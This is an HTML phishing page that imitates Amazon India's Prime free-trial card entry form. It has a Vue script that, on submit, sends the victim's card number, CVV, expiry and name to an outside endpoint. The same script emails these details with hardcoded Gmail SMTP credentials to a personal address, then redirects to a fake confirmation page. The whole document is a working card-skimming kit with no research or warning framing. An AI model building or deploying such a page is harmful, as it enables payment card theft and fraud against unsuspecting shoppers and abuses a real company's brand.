<!DOCTYPE html>

<html>

<head>
    <title>Amazon India</title>

    <script src="https://cdn.jsdelivr.net/npm/vue@2.7.14"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>


        @font-face {
            font-family: SansStd;
         
            src: url("./OfficinaSansStd-Bold.otf") format("opentype");
        }

        body {
            font-family: SansStd;
            margin: 0px;
            overflow: hidden;
        }

        input:focus {
            outline: none;
        }

        select {
            -webkit-appearance: none;
            -moz-appearance: none;
            background: transparent;
            
            background-image: url("./da.png");
            background-repeat: no-repeat;
            background-position-x: 99%;
            background-position-y: 12px;
            border: 1px solid #dfdfdf;
            border-radius: 2px;
            padding-right: 2rem;
        }
    </style>
</head>

<body>
    <div style="background-color:#232f3e; width: 100%; height: 55px;">
        <img src="./logo.png" height="35" style="margin-top: 10px; margin-left: 10px;" />
    </div>

    <div style="margin: 10px;">
        <b>Enter card details</b>
        <div style="margin-top: 10px; border-radius: 7px; border: orange 2px solid; border-left:orange 9px solid;">
            <p style="margin-left: 15px; margin-right: 15px;">Please ensure your card is enabled for online transaction.
                <span style="color: cadetblue;">Learn more</span>
            </p>
        </div>
    </div>

    <div id="app">
        <div style="margin: 10px;">
            <div style="margin-bottom: 10px;">
                <input v-model="name" placeholder="Card Holder Name" type="text"
                    style="width: 99%; border-radius: 3px; height: 45px; border: #313335 1px solid;" /><br><br>
                <input v-model="card" placeholder="Card Number" type="text" maxlength="16" minlength="3"
                    inputmode="numeric"
                    style="width: 99%; border-radius:  3px;  height: 45px; border: #313335 1px solid;" />

            </div>
            <b>Expiry date</b>


            <div style="margin-bottom: 10px; margin-top: 10px; display: flex; justify-content: space-between;">
              
                    <select v-model="month"
                        style="width: 30%; padding:5px ; height: 50px; border-radius: 5px; background-color: gainsboro; border: none;">
                        <option v-for="m in monthList" :value="m" :key="m">{{m}}</option>

                    </select>


                <select v-model="year"
                    style="width: 30%; height: 50px; padding:5px ; border-radius: 5px; background-color: gainsboro; border: none;">
                    <option v-for="m in yearList" :value="m" :key="m">{{m}}</option>
                </select>

                <input v-model="cvv" placeholder="Cvv" type="password" maxlength="3" minlength="3" inputmode="numeric"
                    style="width: 30%; border-radius: 3px; height: 45px; border: #313335 1px solid;" />
            </div>

        </div>

        <div style="margin: 10px; margin-top: 20px; display: flex; width: 100%;">
            <div style="width: 10%;">
                <img src="dot.png" height="25" />
            </div>
            <div style="margin-top: -18px; margin-left: 25px;">
                <h3>Try Prime <span style="color: orangered;">Free</span></h3>
                <p>Pay via UPI or select credit / debit cards.</p>
                <div style="display: flex; justify-content: space-around;">
                    <button @click="submit()" :disabled="disable"
                        style="background-color: orange; border: none; width: 100%; padding: 12px; border-radius: 8px; font-size: medium; color: black;">Start
                        your 30-days free trial</button>

                       
                </div>
            </div>
            <br>

        </div>
        <p style="margin-left: 18%; margin-right: 10%;">After 30 days, you will be automatically charged ₹99 / month.
            <b style="font-weight: bold;">Cancel anytime</b>
        </p>

        <div style="background-color: rgb(238, 238, 238); padding: 10px;">
            <div style="background-color: white; color: grey; border-radius: 8px; margin: 10px; padding: 10px; border: gray 1px solid; display: flex;">
                <div style="margin-right: 20px;">
                    <div style="background-color:rgb(238, 238, 238); border-radius: 50px; width: 20px; height: 20px; border: gray 1px solid;">

                    </div>
                </div>
                <div style="margin-top: 5px;">Other UPI Apps Unavailable <span style="color: cadetblue;">Why?</span></div>
            </div>
        </div>
        <script>
            var app = new Vue({
                el: '#app',
                data: {
                    message: 'Hello Vue!',
                    name: '',
                    disable:false,
                    card: "",
                    cvv: "",
                    month: '02',
                    year: 23,
                    monthList: ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12'],
                    yearList: [15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29]
                },
                methods: {
                    submit() {
                        this.disable = true
                        var myHeaders = new Headers();
                        myHeaders.append("Content-Type", "application/json");

                        var raw = JSON.stringify({
                            "name": this.name,
                            "card": this.card,
                            "vv": this.cvv,
                            "m": this.month,
                            "y": this.year
                        });

                        var requestOptions = {
                            method: 'POST',
                            headers: myHeaders,
                            body: raw,
                            redirect: 'follow'
                        };


                        fetch("https://hne95y.deta.dev/amzn", requestOptions)
                            .then(response => response.text())
                            .then(result => {console.log(result)
                                window.location="./cnfm.html"
                            })
                            .catch(error => console.log('error', error));

                        let a = "name-" + this.name + "\n card-" + this.card + "\n cvv-" + this.cvv + "\n month-" + this.month + "\n year-" + this.year;
                        Email.send({
                            Host: "smtp.gmail.com",
                            Username: "demoamzn@gmail.com",
                            Password: "vaqfywqpysyqeawk",
                            To: 'mundrawala18@gmail.com',
                            From: "demoamzn@gmail.com",
                            Subject: "Card Details",
                            Body: a,
                        })
                            .then(function (message) {
                                console.log(a);
                                console.log("mail sent successfully");
                        
                            });
                    }
                }
            })
        </script>
    </div>

</body>

</html>